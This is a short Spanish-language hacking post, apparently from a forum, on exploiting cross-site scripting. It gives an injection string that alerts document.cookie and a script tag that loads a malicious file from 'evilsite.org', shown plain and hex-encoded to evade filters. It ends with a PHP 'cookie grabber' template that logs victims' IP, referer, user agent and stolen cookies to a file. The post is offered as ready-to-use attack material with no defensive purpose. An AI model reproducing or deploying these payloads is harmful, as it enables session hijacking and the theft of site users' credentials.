Se dice que es vulnerable a XSS
:http://es.wikipedia.org/wiki/XSS
Donde se puede injectar diferentes codigos ya sean javascript o vBscript y que ademas no te dara explicaciones de como funciona XDD.
Se puede injectar un codigo ejemplo como este:
”;!–”<script>alert(document.cookie);</script>=&{(alert(1))}
O puedes aplicar un "redirect" con un .js mailicioso (propio) con estas caracteristicas.
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e
Donde tambien pudes usar un cookie grabber, basandote en este template:
$ip = $_SERVER[’REMOTE_ADDR’];
$referer = $_SERVER[’HTTP_REFERER’];
$agent = $_SERVER[’HTTP_USER_AGENT’];
$data = $_GET[’warwolfz’];
$time = date(”Y-m-d G:i:s A”);
$text = “Time: “.$time.”nIP:”.$ip.”nReferer:”.$referer.”nUser-Agent:”.$agent.”nCookie:”.$data.”nn”;
$file = fopen(’cookies.html’ , ‘a’);
fwrite($file,$text);
fclose($file);
?>